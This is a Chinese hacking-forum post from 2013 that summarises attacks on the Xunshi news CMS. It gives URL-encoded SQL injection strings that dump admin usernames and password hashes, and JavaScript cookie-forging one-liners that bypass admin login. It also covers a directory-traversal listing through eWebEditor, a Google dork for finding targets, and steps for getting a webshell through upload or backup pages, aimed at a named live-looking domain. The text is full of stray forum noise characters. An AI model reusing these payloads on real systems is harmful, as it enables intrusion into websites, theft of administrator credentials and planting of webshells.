找回密码
 立即注册
查看: 3406|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
/ e5 ^  R5 o4 G; r# n1 w% L4 H( v$ E4 f# c4 V; f. [" ~! H
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)8 V5 o5 a; G( a7 J. A2 R
  F1 I: M/ B# m; f0 `( j
以下本文总结来自黑防去年第9期杂志上的内容...
( g/ Y2 S* I7 t0 c0 b% e1 y! n5 d- ^, J
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%1 `4 w& T* k# |$ H% ~

2 C( V/ {8 W" f$ i4 r26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
  t3 P1 C, d* y: l+ Y  U$ ]( L6 U
2 ]. G& z- T/ Z4 c7 x6 H( i* C6 Y记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况8 x0 e4 Q1 _; {) b3 I$ R3 O
这里一个注入
) A( Q1 U1 E# f
1 ^$ c+ f, j! ?( J4 S$ {# i" I: d效果如图:- H1 t* l4 T5 ^: o) _+ l9 j$ H
$ p4 T" B# s; k1 j. E! l
& i2 ]* F. H0 R, ]

& H! l" J( O! g5 k这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
; ~$ E) U2 a( M1 a  U! ]! b* K2 j9 ~
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去  _/ b, o4 c: M% L3 F1 ~
) z6 V  `0 O5 k& [. p
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));+ R6 U. p4 c5 ]" E
6 O. a7 Z! j1 R/ ]. _3 T- g
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
  @3 a" ?5 O) \# }! n. a0 F/ y9 U9 r0 x* j: ?
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞6 S8 u7 s, C( \! ^  x5 `

: L- S& ~. ]' j1 i* ]0 ~它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
  r  P2 D1 p$ P0 }
  {$ m2 z7 j' [访问这页面来列目录..步骤如下:  f. L& d$ w9 b! p

* I6 h# j( n9 V- Hjavascript:alert(document.cookie="admindj=1")
; g1 I4 t2 P2 e7 Y' \- `- D- Y. c3 L3 B
http://www.political-security.co ... asp?id=46&dir=../..2 z3 _% `. E" H- [! G

( H3 N3 y7 x# Q- l, M9 K效果如图:
* n: u8 @: r2 E+ O* ?2 H- G
' g. r( X( o( ^" w( j2 q& Q 0 M5 F: \+ C' Z0 [
# K$ s* q, Z- H$ K7 z; l
这样全站目录都能瞧了..找到后台目录..进去..4 y6 w. w; k4 e9 [; o+ m: s! d6 `$ i
. ~6 H% Z/ @) E; H/ V0 K; A- s' w
那么进了后台怎么拿shell??上传--备份就ok了..# `: ?% l* B3 L% N& d

0 W  Z6 [) K- d5 T那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
3 w3 i1 Q$ z# G6 |9 D
* G, S1 L+ }$ d8 f0 K# i6 o# X这个我也碰到过一次..你都可以通过列目录来实现..
8 f+ ^' @0 c# J. t1 K6 Z( g# l' D+ s: V% i% R
javascript:alert(document.cookie="admindj=1") * G( m% R2 p2 U7 c; r
/ F# s; {" x/ i* P
http://www.political-security.co ... p?action=BackupData
+ \, d/ O7 S" L3 S8 Z" ~
. T0 p7 Q$ S2 E: j备份ok..
3 R4 Y/ `& J8 B
1 {# b' Z2 K! T1 J& g那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?9 x4 T0 g( P! c$ b1 L8 U0 s, }( |  E: E

$ `, ^* S0 N( X6 W! }  A* y1 `在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下/ [, w" X2 A9 F6 j

* r  U, v9 F, A4 `然后访问此页面进行注入..步骤如下:
1 L$ e8 V3 }/ c& O
& U7 F9 G2 Y  g, w9 Xjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")! y" s+ l) M- H& E

3 b9 E1 n) T) J, H( g; B; o然后请求admin/admin_chk.asp页面
/ {0 U& `) o% v5 p' Q  ~, u! |5 @% u+ ~6 w1 F
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%* n  U( N; [/ V0 g& b

3 J( n$ S5 {3 i) R0 y26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin4 W( _" z& F& t- n- d3 v6 ~* Y

/ J0 k3 g2 h6 g* P- l1 X效果如图所示:0 h; |2 u: s' d( g1 }
4 A1 c4 y1 U+ @( t
+ }2 Q) I# _+ h. w$ J- D' I) \$ e

$ s& @4 o# e- a讯时漏洞25 w# J& `1 f5 D
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧); W2 ~& s/ Y  i/ j" }" ^
+ V7 S9 n2 d5 y- B/ Y
1、/admin/admin_news_pl_view.asp?id=1! _8 ]2 t) {" s
//id任意 填入以下语句
; c/ E7 n  A( ^$ h 1 _6 g6 W+ b# Z0 B
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
8 K2 x: y% P2 f; H
( B+ L; o0 w% {$ L" J) Q9 Q6 A2 `7 X" h  x& R: P) W

3 n+ Y+ q1 {8 [8 i- R3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
- T& }) ^9 X; T . P% c& N' ^7 Y% O* p& V7 _# d
  h5 L& N$ `2 K& n! b1 Y- I
4 P3 a: _1 M) ?0 A$ R$ y0 J' m5 \
爆出管理员帐号和密码了" H  g/ R% A0 j# c5 A
1 L" S# b8 B3 E
0 S' \9 r/ n# J# Q

3 H; P) X% ]( ~6 B- z* F7 ?( j: Z4、cookies进后台' i/ H- ]' G9 A) `

4 z' S2 J, h$ X, q" zjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));- b" p1 S$ \  z2 o* P. ?2 }
9 Y! d* Z2 T' g2 w" b' J, ^8 @' r

& e1 h5 D  B! ]7 z8 a- R2 h4 @
6 G8 F0 h, c; @' o( ]4 x5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
, X: W  j/ D  o* r$ y 4 l' u) y% [  K0 z% @! u
& d/ C; v2 r5 o, D  y

8 q  ]- {! Q+ r7 q6 c. g6、后台有上传和备份取SHELL不难。
4 @( n6 M& ]" R9 Y( V
! i; C" F; k. a7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..8 [: l* o2 i# I) v

( o5 N# N" _* U1 N/ K2 x6 i逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!1 F( C; f2 Q5 A' U# I2 U
& j: k4 Z: U5 F. J0 \6 j

  c; p+ ^; N2 S: E, X9 v- O( \, J7 B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表